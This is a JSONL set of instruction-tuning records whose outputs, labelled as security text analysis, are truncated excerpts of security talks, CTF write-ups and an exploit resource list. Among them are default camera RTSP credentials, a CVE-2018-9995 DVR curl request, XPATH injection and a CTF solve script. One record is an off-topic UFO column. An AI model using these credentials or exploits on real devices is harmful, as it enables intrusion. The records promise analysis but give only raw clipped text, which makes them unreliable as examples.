{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWell, really, just SRCDS, but who really cares? Bruce Potter, Logan Lodge gdead@shmoo.com, L0l0@shmoo.com Gaming is a USD47 billion global market. Console gaming alone is estimated to be USD27 billion in size. PC online games is a USD6.5 billion industry. Projected to be USD13 billion by 2012. Online MMOGs is a USD3.5 billion industry. Casual gaming is a USD1.5 billion industry. Read more: http://www.techvibes.com/blog/gameon-finance-2.0-key-gaming- industry-trends-and-market-overview#ixzz0Ch84uUJ0&B At least not talking about them in a coherent fashion There are a lot of reviews that focus on gameplay There are industry analysis sites There are many reviews of gaming hardware Few public discussions of security Few public discussions regarding the merits and impact of underlying technology Beginning to see cultural/anthropological discussions Publisher provided game servers Pretty much all console gaming Some PC games such as WoW Community driven game servers What drives people to run game servers? Its a lot like OSS Convenience, fame, money, fun Call of Duty  CoD2  CoD4  CoD WW Half-Life  Half Life  TFC  Counter Strike Source Engine  HL2DM  TF2  Left4Dead  CS:Source Battlefield  BF  BF2 There are others.. Quake, UT, etc.. Why? Valve has created a platform that not only supports their needs, but allows for massive amounts of customization Huge number of servers deployed Gametracker.com has CS:S as #2 (10700 Servers, 25000 players), L4D as #6 (3000 Servers, 3000 Users), TF2 as #9 (2300 Servers, 8500 Users) at 8pm on a Monday Steam has ~1.5Million active users each day many of them playing Source-based games The real reason: I play a LOT of TF2 150 hours on demoman.. Yeah, its a problem The big challenge: provide a good gaming experience for the person with a 1.6GHz PIV on a 256k DSL line and a person with an i7 on the ass end of a 25Mbps FIOS connection 256kbps 768kbps SRDS is a complex piece of software Tries to provide Real Time service on OSs that arent RTOS Enfor", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nExploitations of XNU Port Type Confusions Tielei Wang The background Background of the talk iOS 14.2, released on Nov 5, 2020, fixed an in-the-wild exploit reported by Google Project 0. First in-the-wild exploit since iOS 14 (?) Safari RCE (CVE-2020-27930) kernel info leak (CVE-2020-27950) kernel type confusion (CVE-2020-27932) Background of the talk  While analyzing CVE-2020-27932, we discovered a new variant issue in the XNU kernel - a port type confusion vulnerability  We analyzed the root cause of the vulnerability at Zer0Con 2021, and presented a way to gain the root privilege on macOS Big Sur on Apple Silicon M1  Today: share more attempts to exploit the port type confusion issue A brief introduction of Mach ports  XNU - X is Not Unix  Mach  BSD  IOKits A brief introduction of Mach ports  XNU - X is Not Unix Hybrid kernel  Mach  BSD  IOKits  A brief introduction of Mach ports  XNU - X is Not Unix Hybrid kernel  Mach Microkernel  BSD  IOKits   A brief introduction of Mach ports  XNU - X is Not Unix Hybrid kernel  Mach Microkernel  BSD  IOKits   A fundamental design: Inter-process communication (IPC) A brief introduction of Mach ports  XNU - X is Not Unix Hybrid kernel  Mach Microkernel  BSD  IOKits   A fundamental design: Inter-process communication (IPC) Mach Port Mach port vs UNIX file Userspace integer integer Usage mach_msg_send mach_msg_receive write read Permissions send right receive right send-once right O_RDONLY O_WRONLY O_RDWR NameSpace per-task per-proc Kernel struct ipc_port struct fileproc Opaque objects task, thread, voucher vnode, socket, device Mach ports are far more complicated and powerful!  A mach port is a kernel-maintained message queue  multiple sender, single receiver  Mach messages can carry both port rights, memory, and inline raw data Body optional mach_msg_*_descriptor Header Destination Port Rights Memory Inline data  Transfer port send/recv rights to destination Mach ports are far more complicated and powerful!  While sending a messag", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Device-Exploits --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- **硬件产品默认口令** - [硬件产品默认口令](http://www.r4v3zn.com/spear-framework/#/default-pwd/hardware-products) --- ## CPU **Meltdown/Spectre** - 相关文章 - [An Explanation of the Meltdown/Spectre Bugs for a Non-Technical Audience](https://blog.cloudflare.com/meltdown-spectre-non-technical/) - [简单谈谈近期的 Intel 处理器漏洞](https://bbs.kafan.cn/thread-2112818-1-1.html) - POC | Payload | exp - [speed47/spectre-meltdown-checker](https://github.com/speed47/spectre-meltdown-checker) - [Eugnis/spectre-attack](https://github.com/Eugnis/spectre-attack) - [turbo/KPTI-PoC-Collection](https://github.com/turbo/KPTI-PoC-Collection) - [google/security-research-pocs](https://github.com/google/security-research-pocs) - https://leaky.page/ - JavaScript编写的Spectre漏洞PoC演示基于Web的Spectre攻击的可行性 **PLATYPUS** - https://platypusattack.com/ --- ## Camera **RTSP 弱口令** - 华为 : `rtsp://admin:HuaWei123@IP/LiveMedia/ch1/Media1` - 海康威视 主码流 : `rtsp://admin:12345@IP:554/h264/ch1/main/av_stream` - 海康威视 主码流 : `rtsp://admin:12345@IP:554/MPEG-4/ch1/main/av_stream` - 海康威视 主码流 : `rtsp://admin:12345@IP:554/h264/ch1/main/av_stream` - 海康威视 子码流 : `rtsp://admin:12345@IP/mpeg4/ch1/sub/av_stream` - 海康威视 子码流 : `rtsp://admin:12345@IP/h264/ch1/sub/av_stream` - 宇视 主码流 : `rtsp://admin:admin@IP:554/video1` - 宇视 子码流 : `rtsp://admin:admin@IP:554/video2` - 宇视 三码流 : `rtsp://admin:admin@IP:554/video3` ### 海康威视 **相关工具** - [4n4nk3/HikPwn](https://github.com/4n4nk3/HikPwn) **CVE-2017-7921** - 相关文章 - [Hikvision海康威视摄像头CVE-2017-7921漏洞解析](https://www.freebuf.com/vuls/278336.html) - POC | Payload | exp - [WormChickenWizard/hikvision-decrypter](https://github.com/WormChickenWizard/hikvision-decrypter) **CVE-2021-36260** - POC | Payload | exp - [TaroballzChen/CVE-2021-36260-metasploit](https://github.com/TaroballzChen/CVE-2021-36260-metasploit) ### DVR **CVE-2018-9995** - POC | Payload | exp ``` curl \"http://xxx.xxx.xxx.xxx/device.rsp?opt=user&cmd=list\" -H \"Cookie: uid=admin\" ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## 1. A3/A8 **COMP128**算法是[GSM](https://en.wikipedia.org/wiki/GSM \"全球移动通信系统\")标准中定义的 A3 和 A8 函数的实现A3 用于向网络[验证移动站](https://en.wikipedia.org/wiki/Authentication \"验证\")A8 用于生成[会话密钥](https://en.wikipedia.org/wiki/Session_key \"会话密钥\")A5 使用该会话密钥对移动台和[BTS](https://en.wikipedia.org/wiki/Base_Transceiver_Station \"基地收发站\")之间传输的数据进行加密 COMP128 共有三个版本他们本来是保密的第一个版本的部分描述于 1997 年泄露并通过[逆向工程](https://en.wikipedia.org/wiki/Reverse_engineering \"逆向工程\")完成这导致了 1998 年的完整出版第二和第三个版本是通过验证 SIM 卡合规性的软件逆向工程获得的 ## 2. A5/1 **A5/1**是一种[流密码](https://en.wikipedia.org/wiki/Stream_cipher \"流密码\")用于在[GSM](https://en.wikipedia.org/wiki/Global_System_for_Mobile_Communications \"全球移动通信系统\")[蜂窝电话](https://en.wikipedia.org/wiki/Cell_phone \"手机\")标准中提供无线通信[隐私](https://en.wikipedia.org/wiki/Privacy \"隐私\")它是 A5 安全协议的几种实现之一它最初是保密的但通过泄密和[逆向工程](https://en.wikipedia.org/wiki/Reverse_engineering \"逆向工程\")成为公众所知已发现密码中的许多严重弱点 A5/1 流密码使用三个[LFSR](https://en.wikipedia.org/wiki/LFSR \"低频SR\")如果一个寄存器的时钟位橙色与其他两个寄存器中的一个或两个的时钟位一致则该寄存器被计时三个寄存器的长度不是随机选择的由于三个寄存器的度数互质因此该生成器的周期是三个寄存器周期的乘积因此 A5/1 的周期重复之前是 264 位2 的 64 次方 ## 3. A5/2 **A5/2**是一种[流密码](https://en.wikipedia.org/wiki/Stream_cipher \"流密码\")用于在[GSM](https://en.wikipedia.org/wiki/GSM \"全球移动通信系统\") [蜂窝电话](https://en.wikipedia.org/wiki/Cell_phone \"手机\")协议中提供语音隐私它于 1992-1993 年设计1993 年 3 月完成作为相对更强但仍然较弱的[A5/1](https://en.wikipedia.org/wiki/A5/1 \"A5/1\")的替代品以允许 GSM 标准出口到限制进口具有加密安全功能的产品的国家 该密码基于四个具有不规则时钟的[LFSR](https://en.wikipedia.org/wiki/Linear-feedback_shift_register \"线性反馈移位寄存器\")和一个[非线性](https://en.wikipedia.org/wiki/Non-linear)组合器的组合 ## 4. AAA **AAA** refers to **[Authentication](https://en.wikipedia.org/wiki/Authentication \"Authentication\") (认证提供身份性 to prove identity), [Authorization](https://en.wikipedia.org/wiki/Authorization \"Authorization\") (授权授予批准 to give permission) and [Accounting](https://en.wikipedia.org/wiki/Audit_trail \"Audit trail\") (记账记录审计记录 to log an audit trail).** ## 5,6,7,8 Access - XX Access-Accept (访问-接收)是一种RADIUS协议消息用于通知RADIUS客户端其访问请求已被授权并提供相关配置信息 Access-Challenge (访问-质询)是一种RA", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n--- title: SET categories: Information Gathering tags: [information gathering,SET,kali linux] date: 2020-07-13 11:00:23 --- SET包介绍 ---------- Social-Engineer Toolkit是专为社会工程Social-Engineering设计的开源渗透测试框架SET具有许多自定义的攻击向量使你可以在短时间内进行可信的攻击 工具来源 https://github.com/trustedsec/social-engineer-toolkit/ [SET主页][1] | [Kali SET仓库][2] - 作者David Kennedy, TrustedSec, LLC - 证书BSD SET包中包含的工具 ---------- The Social-Engineer Toolkit. SET用法示例 ---------- ``` root@kali:~# setoolkit 01011001011011110111010100100000011100 10011001010110000101101100011011000111 10010010000001101000011000010111011001 10010100100000011101000110111100100000 01101101011101010110001101101000001000 00011101000110100101101101011001010010 00000110111101101110001000000111100101 10111101110101011100100010000001101000 01100001011011100110010001110011001000 00001110100010110100101001001000000101 01000110100001100001011011100110101101 11001100100000011001100110111101110010 00100000011101010111001101101001011011 10011001110010000001110100011010000110 01010010000001010011011011110110001101 10100101100001011011000010110101000101 01101110011001110110100101101110011001 01011001010111001000100000010101000110 11110110111101101100011010110110100101 11010000100000001010100110100001110101 011001110111001100101010 [---] 社会工程师工具包 (SET) [---] [---] 创建人David Kennedy (ReL1K) [---] 版本: 7.7.9 代号: 'Blackout' [---] 在Twitter上关注我们@TrustedSec [---] [---] 在Twitter上关注我@HackingDave [---] [---] 主页https://www.trustedsec.com [---] 欢迎来到Social-Engineer ToolkitSET 一站式服务满足您所有的SE需求 在irc.freenode.net的#setoolkit频道中加入我们 Social-Engineer Toolkit是TrustedSec的产品 访问: https://www.trustedsec.com 使用PenTesters框架更新很容易! (PTF) 访问https://github.com/trustedsec/ptf更新您的所有工具! 从菜单中选择: 1) 社会工程攻击 2渗透测试快速通道 3) 第三方模块 4更新社会工程师工具包 5更新SET配置 6) 帮助积分和关于 99退出社会工程师工具包 set> ``` [1]: https://github.com/trustedsec/social-engineer-toolkit/ [2]: https://gitlab.com/kalilinux/packages/set", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 Julian Grizzard DEFCON 13 Surgical Recovery from Kernel-Level Rootkit Installations Linux Based Systems Julian Grizzard July 2005 DEFCON THIRTEEN 2 Julian Grizzard DEFCON 13 Latest Slides and Tools PLEASE DOWNLOAD THE LATEST SLIDES AND TOOLS [ Latest slides available ] http://www.ece.gatech.edu/research/labs/nsa/presentations/dc13_grizzard.pdf [ Latest system call table tools ] http://www.ece.gatech.edu/research/labs/nsa/sct_tools.shtml [ Latest spine architecture work ] http://www.ece.gatech.edu/research/labs/nsa/spine.shtml 3 Julian Grizzard DEFCON 13 Problem What does a rootkit do?  Retain Access  Trojan sshd client with hard coded user/pass for root access  Initiate remote entry by specially crafted packet stream  Hide Activity  Hide a process including resource usage of process  Hide malicious rootkit kernel modules from lsmod 4 Julian Grizzard DEFCON 13 Most Widely Accepted Solution Format and Reinstall 5 Julian Grizzard DEFCON 13 Monolithic Operating System 6 Julian Grizzard DEFCON 13 Kernel Space 7 Julian Grizzard DEFCON 13 User Space 8 Julian Grizzard DEFCON 13 Microkernel Operating System 9 Julian Grizzard DEFCON 13 Microkernel Operating System 10 Julian Grizzard DEFCON 13 Microkernel Operating System 11 Julian Grizzard DEFCON 13 Intel Descriptor Privilege Level  Level 3  Minimal hardware access  User space processes run at level 3  Level 2  Limited hardware access  N/A in Linux  Level 1  Limited hardware access  N/A in Linux  Level 0  Unlimited hardware access  Kernel space threads run at level 0 Kernel Space User Space 12 Julian Grizzard DEFCON 13 Testing Privilege Level - User (R3) #include <stdio.h> #include <stdint.h> int main() { uint16_t cs_reg; asm(\"mov %%cs,%0\" : \"=m\" (cs_reg)); cs_reg = cs_reg & 0x0003; printf(\"ring: %d\\n\", cs_reg); return 0; } 13 Julian Grizzard DEFCON 13 Testing Privilege Level - User (R3) 14 Julian Grizzard DEFCON 13 Testing CPL - Kernel (R0) #include <linux/module.h> #include <linux/kernel.h> #include <linux/init.h> static ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n{ Breaking the x86 ISA domas / @xoreaxeaxeax / DEF CON 2017 Christopher Domas Cyber Security Researcher @ Battelle Memorial Institute ./bio We dont trust software. We audit it We reverse it We break it We sandbox it Trust. But the processor itself? We blindly trust Trust. Why? Hardware has all the same problems as software Secret functionality? Appendix H. Bugs? F00F, FDIV, TSX, Hyperthreading, Ryzen Vulnerabilities? SYSRET, cache poisoning, sinkhole Trust. We should stop blindly trusting our hardware. Trust. What do we need to worry about? Historical examples ICEBP (f1) LOADALL (0f07) apicall (0ffff0) Hidden instructions So whats this?? Find out whats really there Goal: Audit the Processor How to find hidden instructions? The challenge Instructions can be one byte  inc eax 40  or 15 bytes ... lock add qword cs:[eax + 4 * eax + 07e06df23h], 0efcdab89h 2e 67 f0 48 818480 23df067e 89abcdef Somewhere on the order of 1,329,227,995,784,915,872,903,807,060,280,344,576 possible instructions The challenge https://code.google.com/archive/p/corkami/wikis/x86oddities.wiki The obvious approaches dont work: Try them all? Only works for RISC Try random instructions? Exceptionally poor coverage Guided based on documentation? Documentation cant be trusted (thats the point) Poor coverage of gaps in the search space The challenge Goal: Quickly skip over bytes that dont matter The challenge Observation: The meaningful bytes of an x86 instruction impact either its length or its exception behavior The challenge A depth-first-search algorithm Tunneling Guess an instruction: Tunneling 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Execute the instruction: Tunneling 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Observe its length: Tunneling 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Increment the last byte: Tunneling 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 Execute the instruction: Tunneling 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 Observe its length: Tunneling 00 01 00 00 00 00 00 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPhantom Attack: Evading System Call Monitoring Rex Guo, Ph.D. Junyuan Zeng, Ph.D. @Xiaofei_Rex jzeng04 *NOSPAM* gmail DOT com web app RCE on joe-box and executed a reverse shell An Incident - An Attackers View web app RCE on joe-box and executed a reverse shell An Incident - An Attackers View Privilege escalation using sudo CVE-2021-3156 web app RCE on joe-box and executed a reverse shell read /etc/shadow An Incident - An Attackers View Privilege escalation using sudo CVE-2021-3156 web app RCE on joe-box and executed a reverse shell read /etc/shadow Read ssh process environment variable An Incident - An Attackers View Privilege escalation using sudo CVE-2021-3156 web app RCE on joe-box and executed a reverse shell read /etc/shadow Read ssh process environment variable Lateral movement to alice-box with ssh hijacking An Incident - An Attackers View Privilege escalation using sudo CVE-2021-3156 web app RCE on joe-box and executed a reverse shell read /etc/shadow Read ssh process environment variable Lateral movement to alice-box with ssh hijacking An Incident - An Attackers View Privilege escalation using sudo CVE-2021-3156 web app RCE on joe-box and executed a reverse shell Privilege escalation using sudo CVE-2021-3156 read /etc/shadow Read ssh process environment variable Lateral movement to alice-box with ssh hijacking An Incident  A Defenders View connect etc. execve(at) open(at) open(at) connect, etc. Incident Response Detection Rule Example rule: untrusted program reads /etc/shadow condition: syscall == open(at) and read permission and filename == /etc/shadow and program is not in allowlist Agenda Introduction to System Call Monitoring Open Source System Call Monitoring Projects TOCTOU - Phantom v1 Attack Semantic confusion - Phantom v2 Attack Takeaways System Call Monitoring (1) User Space Kernel Space Programs Applications Syscall Code Path Hooks syscall events Monitoring Agent System Call Monitoring  Syscall Interception (1)  tracepoint/raw_tracepoint  Kernel", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Artisinal Handcrafted HTTP 3 Web Exploitation, 300 points ## Description: > We found a hidden flag server hiding behind a proxy, but the proxy has some... _interesting_ ideas of what qualifies someone to make HTTP requests. Looks like you'll have to do this one by hand. Try connecting via nc 2018shell3.picoctf.com 29621, and use the proxy to send HTTP requests to `flag.local`. We've also recovered a username and a password for you to use on the login page: `realbusinessuser`/`potoooooooo`. ## Solution: This challenge requires us to handcraft HTTP requests in order to log into a remote page. The following script solves the challenge: ```python from pwn import * import re def get(url, headers = None): http = \"GET {} HTTP/1.1\\r\\nHost: flag.local\\r\\nConnection: keep-alive\\r\\n\".format(url) if headers is not None: for header in headers: http += header + \"\\r\\n\" http += \"\\r\\n\" log.info(\"HTTP GET Request:\\n{}\".format(http)) return http def post(url, content): http = \"\"\"POST {} HTTP/1.1 Host: flag.local Content-Type: application/x-www-form-urlencoded Content-Length: {} Connection: keep-alive {} \"\"\".format(url, len(content), content) log.info(\"HTTP POST Request:\\n{}\".format(http)) return http r = remote(\"2018shell3.picoctf.com\", 29621) print r.recvuntil(\"\\n\\n>\") answer = raw_input(\"Answer? \") r.send(answer) r.recvuntil(\"HTTP.\") r.send(get(\"/login\")) res = r.recvuntil(\"</html>\") log.info(\"Received:\\n{}\".format(res)) r.send(post(\"/login\", \"user=realbusinessuser&pass=potoooooooo\")) res = r.recvuntil(\"Redirecting to /\") log.info(\"Received:\\n{}\".format(res)) match = re.search(\"set-cookie: real_business_token=([;]+);\", res, re.M) cookie = match.group(1) log.info(\"Cookie: {}\".format(cookie)) cookie = \"Cookie: real_business_token={};\".format(cookie) r.send(get(\"/\", headers = [cookie])) res = r.recv(timeout=6) log.info(\"Received:\\n{}\".format(res)) print r.recvall() ``` The output is: ```console root@kali:/media/sf_CTFs/pico/Artisinal_Handcrafted# python solve.py [+] Opening connectio", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCloud inSecurity TT@chroot.org HIT2008 Cloud inSecurity Who am I? Camera man @ HITCon Member @ Sr. Engineer @ Network Security Web 2.0 Security BSD/Linux Kernel Firewall Internal IPS/IDS Anti-SPAM Antivirus Programming Network Appliance 苦命工程師 過勞 好人 Orz Network Access Control 加班 Before the Presentation This is a trend discussion. No deep technical issues. Its about new security model. Not technology. AGENDA Cloud Computing in Security World AGENDA Vendors are eager to adopt this technology. Are bad guys scared? (Or excited ) AGENDA and  What about Bad guys 0wn the Cloud. What is the Cloud Computing? What is Cloud Computing? SaaS (Software as a Service) In-the-cloud Service Thin Client Cloud Computing (SaaS) Move applications, storages,  To Cloud Servers. Client becomes simple. Cloud Computing (SaaS) Still no idea? Google web applications Amazon EC2/S3/Simple DB  Cloud Computing (SaaS) No hardware issues, No software update, No storage problem, and You can use it wherever you are. Cloud Computing (SaaS) This model is amazing, and really changed our life. But you may already know, hackers are always ahead of us. They knows cloud computing very long time ago. How it works? Scenario 1 駭客小陳 的 Cloud Computing 雲端儲存 肉雞儲存 ________ 小陳的雲 (烏雲) 無辜的人 小陳 馬神 後門神 How it works? Scenario 2 還是 駭客小陳 的 Cloud Computing 雲端運算 肉雞運算 ________ 小陳的雲 (烏雲) John 神 小陳 Shadow 密碼檔 Grid Computing How it works? Scenario 3 還是 駭客小陳 的 Cloud Computing 雲端運算 肉雞運算 ________ 小陳的雲 (烏雲) 無辜的網站 DDoS 神 小陳 不爽 召喚 Bot Net MD5 Rainbow Table 本站4T硬盘已经上线,共有md5记录 457,354,352,282条宇宙第一且还在不断增长 中已包含12位及12位以下数字8位字母全部 7 位及以下字母加数字等组合并针对国内用户做 了大量优化例如已经包含所有手机号码全国部 分大中城市固定电话号码百家姓常用拼音等大 量组合另加入 了大型网站真实会员密码数据100 万条本站数据量大查询速度快同时支持16 位及32位密码查询通过对10万会员的真实动网 论坛样本数据的测试本 站对于动网论坛密码的 命中率达到83%全国独此一家 Dark Cloud Malware is software, software is moving to the cloud, therefore, malware is moving to the cloud. Dark Cloud Malware as a Service MaaS Dark Cloud  Profit Driven Criminals have adopted the new model too, and are offering crimeware as a service", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvanced Netfilter; Content Replacement (ala Snort_inline) and Port Knocking Based on p0f DEFCON 12 Michael Rash http:/ / www.cipherdyne.org http:/ / www.enterasys.com / 08/ 01/ 2004 Introduction  Iptables logging form at  Passive OS fingerprinting with p0f  What can iptables tell us?  fwknop  Iptables string m atch extension  Snort_inline  String replacem ent patch  Netperf benchm arks Iptables Logs iptables - A INPUT - p tcp - i eth0 - j DROP - - log- prefix DROP  - - log- tcp- options Iptables Logs; Decoded IP header fields  Source and destination IP addresses  IP datagram length  Type of service  TTL  IP ID  Fragm ent bits  Protocol Jul 8 03:06:12 orthanc kernel: DROP IN= eth0 OUT= MAC= 00:a0:cc:28:42:5a:00:00:00:22:2d:42:00:00 SRC:192.168.10.3 DST:192.168.10.1 LEN= 60 TOS= 0x10 PREC= 0x00 TTL= 64 ID= 6854 DF PROTO= TCP Iptables Logs; Decoded TCP header fields  Source and destination ports  TCP window siz e  TCP flags Jul 8 03:06:12 orthanc kernel: DROP IN= eth0 OUT= MAC= 00:a0:cc:28:42:5a:00:00:00:22:2d:42:00:00 SRC:192.168.10.3 DST:192.168.10.1 LEN= 60 TOS= 0x10 PREC= 0x00 TTL= 64 ID= 6854 DF PROTO= TCP SPT= 32788 DPT= 5500 WINDOW= 5840 RES= 0x00 SYN URGP= 0 Iptables Logs; Encoded TCP header fields  TCP options!!! p0f depends on this. Jul 8 03:06:12 orthanc kernel: DROP IN= eth0 OUT= MAC= 00:a0:cc:28:42:5a:00:00:00:22:2d:42:00:00 SRC:192.168.10.3 DST:192.168.10.1 LEN= 60 TOS= 0x10 PREC= 0x00 TTL= 64 ID= 6854 DF PROTO= TCP SPT= 32788 DPT= 5500 WINDOW= 5840 RES= 0x00 SYN URGP= 0 OPT (020405B40402080A006F1D8E0000000001030300) TCP options; What does p0f Care About?  MSS (Maxim um Segm ent Siz e)  Window scale  Selective acknowledgem ent (perm itted bits)  NOP  Tim estam p Encoding: type (8 bits) / total length (8 bits) / value (n - 16 bits) e.g. 020405b4 = MSS / 4 bytes / 1460 Decoded TCP options  OPT (020405B40402080A00749E860000000001030300)  MSS = 1460  Selective Acknowledgem ent perm itted  Tim estam p  NOP  Window Scale = 0 Packet Summary  Length = 60  Don't ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUniversal plug and play (UPnP) mapping attacks Daniel Garcia Abstract Universal Plug and Play is a popular method for NAT traversal used by common household devices. This document explores the different techniques attackers can use to exploit port mapping services of UPnP/IGD devices on WAN ports. It also details a tool called Umap that can do manual port-mapping(WAN to LAN, WAN to WAN), nat- traversal and SOCKSv4 proxy service that automatically maps to UPnP devices. Devices with WAN ports allowing UPnP actions are the minority, but still a big threat. Introduction Universal Plug and Play(UPnP) is a technology developed by the UPnP Forum in 1999, after funding mainly by Microsoft. The goal set by the UPnP forum, at that time, was to allow devices to connect seamlessly and simplify network implementations. The only problem with this goal is that it is inherently insecure. A secure system can't be plug and play, it needs to ask questions and validate information. This is exactly one of the main problems in UPnP, as it lacks any form of authentication. To worsen the situation, control points are sometimes configured to accept requests from the LAN and WAN side of the device. The control points are URL's where the SOAP requests are directed for the execution of actions in UPnP. The most common actions used are AddPortMapping and DeletePortMapping, used for the port mapping of devices wanting to traverse the NAT. UPnP Steps 0. Addressing: Interaction with the addressing methods used by the devices. It also establishes rules for devices that are unable to get an address through DHCP. 1. Discovery: Discovery and announcement of the devices using SSDP. The devices send multicast search requests using HTTPU. Control points respond with HTTPU packets that specify a location for the XML description file. 2. Description: After the discovery of the XML description file location, the device downloads the XML to discover the different services and actions that the device has avai", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAfter 35 years of serious investigation, exploration, and reflection, engaged with the best researchers in the field, it was time to make as succinct and clear a statement as I could, within the constraints of 1200 words for the Crossroads section in the Sunday Milwaukee Journal Sentinel. It was also a way for a mainstream newspaper, the winner of many awards, to implicitly suggest that the subject is more than tabloid fodder. http://www.jsonline.com/news/opinion/out-of-the-closet-on-ufos-b99203753z1- 245623181.htmlhttp://www.jsonline.com/news/opinion/out-of-the-closet-on-ufos- b99203753z1-245623181.html A Confession: Out of the Closet on UFOs - February 16 2014 Let me put it to you straight. For 35 years I have been exploring and investigating UFOs and UFOlogy (both the serious endeavor and the silly speculative fare that fills popular culture) and ... well, UFOs are real: They fly, they evince technologies we dont understand, and they have been around for years. Above all, despite voluminous and overwhelming evidence to support those assertions, to raise this subject as worthy of historical and scientific investigation is to invite ridicule, the shaking of pitying heads, derision and hostility, and embarrassed silence. Still, I persist in believing, as Francis Bacon said in 1620, that if something deserves to exist, it deserves to be known, not rejected out of hand with prejudice. The scientific method, principles of historical analysis, and an open mind ask that much. No subject has been more marginalized and maligned than this topic. By unidentified flying objects I mean not the many things commonly mistaken for them  balloons, Venus, sprites, ball lightning, secret craft, etc. I mean anomalous vehicles which for decades have been well documented by credible observers (Credible people have seen incredible things, said General John Samford, US Air Force Chief of Intelligence, in 1953), to which our government responded with the formulation and execution of polici", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# X marks the spot Category: Web, 250 points ## Description > Another login you have to bypass. Maybe you can find an injection that works? > > Hint: XPATH ## Solution Visiting the website, we are presented with a login form (and a Robert Frost poem): ```html <div class=\"login-form\"> <form role=\"form\" action=\"/\" method=\"post\"> <div class=\"row\"> <div class=\"form-group col-xs-6\"> <input type=\"text\" name=\"name\" id=\"name\" class=\"form-control input-lg\" placeholder=\"username\"> </div> <div class=\"form-group col-xs-6\"> <input type=\"text\" name=\"pass\" id=\"pass\" class=\"form-control input-lg\" placeholder=\"password\"> </div> </div> <div class=\"row\"> <div class=\"col-xs-4\"> </div> <div class=\"col-xs-4\"> <input type=\"submit\" class=\"btn btn-lg btn-primary btn-block\" value=\"Login\"> </div> <div class=\"col-xs-4\"> </div> </div> </form> <!-- Two roads diverged in a yellow wood, And sorry I could not travel both And be one traveler, long I stood And looked down one as far as I could To where it bent in the undergrowth; Then took the other, as just as fair, And having perhaps the better claim, Because it was grassy and wanted wear; Though as for that the passing there Had worn them really about the same, And both that morning equally lay In leaves no step had trodden black. Oh, I kept the first for another day! Yet knowing how way leads on to way, I doubted if I should ever come back. I shall be telling this with a sigh Somewhere ages and ages hence: Two roads diverged in a wood, and I I took the one less traveled by, And that has made all the difference. -Robert Frost --> </div> </div> ``` The hint says \"XPATH\", and using some common XPATH injection techniques we can leak some information about the underlying DB. The idea is similar to SQL injection. We have a vulnerable query for authenticating the username and password which should be similar to: ``` string(//user[name/text()='\" + input_username + \"' and password/text()='\" + input_password + \"']/account/text()) ``` So, if we inject some ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJon Rose Trustwaves SpiderLabs Flash Remoting Technologies Flex Data Services  Data Management  Update client and/or server when data changes  Messaging  Real Time Messaging protocol (RTMP)  Pub-sub model  Real-time data streaming  Remoting  HTTP, SOAP, AMF  Automatic data marshalling  PDF  Create and edit PDFs CrossDomain.xml Flash Remoting Insecurity  Developers fail to restrict access to methods:  Authentication  Authorization  Method & Service names can be brute-forced  Flex servers can be fingerprinted  Common vulns in remote methods:  Injections  Information leakage  Denial of service  Privilege escalation Finding Methods & Services  Decompile SWF and search for remoting calls  Watch network traffic  Dictionary attack against server Finding SWF Remoting Calls  Download SWF file  Decompile  Sothink SWF decompiler or HP SWFScan  Analyze ServerConfig.xml  Regex for remoting methods SWF Remoting ServerConfig.xml  Often embedded in the SWF  Provide URL's and service names  Destination id represents services  securityService  exampleService  mathService SWF Remoting Search  Search for remoting methods  send, service, remote, etc findstr /I /N /S sender\\.\" *.as AMF Network Traffic  AMF is:  Serialized ActionScript object  Transported as HTTP POST body  Charles proxy can intercept and decode AMF traffic  Wireshark captures can disclose Url's, Services, and Methods  No native decoder AMF Network  Charles Proxy AMF Network  Wireshark Dictionary Attacks  Determine valid service and methods  Based on error messages  Fairly fast  Easily predictable method/service names  Login  getters  setters  Possible to build default wordlist Securing Flash Remoting  BlazeDS  Only public methods defined in remoting-config can be called  Use security-constraints in remoting-config.xml to each method  include-methods  exclude-methods  Read the Adobe BlazeDS security docs Securing Flash Remoting  AMFPHP  Methods that start with an underscore cannot be remotely called  Remove the Service Br", "category": "text_analysis", "source": "security_papers"}
